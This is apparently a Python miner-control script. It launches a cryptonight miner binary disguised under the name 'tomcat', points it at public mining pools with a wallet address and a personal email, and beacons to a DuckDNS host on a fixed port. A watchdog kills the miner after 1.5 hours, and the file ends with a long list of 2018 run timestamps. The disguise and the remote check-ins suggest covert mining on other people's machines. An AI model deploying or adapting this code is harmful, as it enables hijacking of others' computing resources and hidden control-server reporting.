import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:28:04.050061
#2018-02-17 16:15:08.013036
#2018-02-17 18:04:05.753956
#2018-02-17 19:52:01.928556
#2018-02-17 21:40:08.626975
#2018-02-17 23:24:06.645823
#2018-02-18 01:13:04.380882
#2018-02-18 03:01:01.331504
#2018-02-18 04:50:04.157892
#2018-02-18 06:40:05.355309
#2018-02-18 08:29:05.459054
#2018-02-18 10:17:01.384580
#2018-02-18 12:03:05.552089
#2018-02-18 13:48:01.275463
#2018-02-18 15:38:04.410331
#2018-02-18 17:27:05.802274
#2018-02-18 19:15:01.438475
#2018-02-18 21:01:04.460475
#2018-02-18 22:46:07.339954
#2018-02-19 00:35:05.455265
#2018-02-19 02:21:07.128356
#2018-02-19 04:08:06.437133
#2018-02-19 05:52:06.195278
#2018-02-19 07:42:09.253195
#2018-02-19 09:31:07.748030
#2018-02-19 11:21:02.039253
#2018-02-19 13:08:04.658294
#2018-02-19 14:56:06.956129
#2018-02-19 16:43:06.185543
#2018-02-19 18:29:08.958301
#2018-02-19 20:16:08.946089
#2018-02-19 22:05:05.976452
#2018-02-19 23:50:08.652230
#2018-02-20 01:37:06.440892
#2018-02-20 03:25:07.007239
#2018-02-20 05:12:03.831833
#2018-02-20 06:54:05.653567
#2018-02-20 08:40:09.161947
#2018-02-20 10:24:06.665869
#2018-02-20 12:09:01.526371
#2018-02-20 13:56:01.807853
#2018-02-20 15:39:08.734741
#2018-02-20 17:23:04.657578
#2018-02-20 19:14:01.277588
#2018-02-20 21:03:05.819926
#2018-02-20 22:47:01.752105
#2018-02-21 00:27:07.530052
#2018-02-21 02:13:07.717728
#2018-02-21 04:01:05.306922
#2018-02-21 05:48:03.656302
#2018-02-21 07:37:04.833736
#2018-02-21 09:22:04.026981
#2018-02-21 11:10:12.102904
#2018-02-21 12:59:01.486282
#2018-02-21 14:46:06.085779
#2018-02-21 16:33:15.010850
#2018-02-21 18:23:09.836616
#2018-02-21 20:09:05.212773
#2018-02-21 21:56:07.514165
#2018-02-21 23:45:02.567459
#2018-02-22 01:35:08.392843
#2018-02-22 03:22:05.732948
#2018-02-22 05:10:01.808632
#2018-02-22 06:53:03.457569
#2018-02-22 08:39:06.554985
#2018-02-22 10:26:05.890952
#2018-02-22 12:13:01.627880
#2018-02-22 13:58:01.727704
#2018-02-22 15:45:08.974329
#2018-02-22 17:33:09.291716
#2018-02-22 19:20:06.576422
#2018-02-22 21:11:07.595327
#2018-02-22 22:56:01.428243
#2018-02-23 00:44:05.629843
#2018-02-23 02:32:02.200402
#2018-02-23 04:19:03.812292
#2018-02-23 06:07:03.314926
#2018-02-23 07:52:05.415728
#2018-02-23 10:07:01.263102
#2018-02-23 11:59:08.137274
#2018-02-23 13:48:13.315663
#2018-02-23 15:38:05.991576
#2018-02-23 17:25:10.961844
#2018-02-23 19:12:04.512278
#2018-02-23 20:57:04.174207
#2018-02-23 23:06:05.728825
#2018-02-24 00:51:03.637577
#2018-02-24 02:43:04.298875
#2018-02-24 04:37:06.082025
#2018-02-24 06:21:05.219027
#2018-02-24 08:09:02.204071
#2018-02-24 09:53:04.932991
#2018-02-24 11:48:06.480650
#2018-02-24 13:39:07.719868
#2018-02-24 15:27:04.387849
#2018-02-24 17:16:07.758658
#2018-02-24 19:09:06.346523
#2018-02-24 20:58:01.502185
#2018-02-24 23:26:06.232706
#2018-02-25 02:49:06.132752
#2018-02-25 06:26:03.935046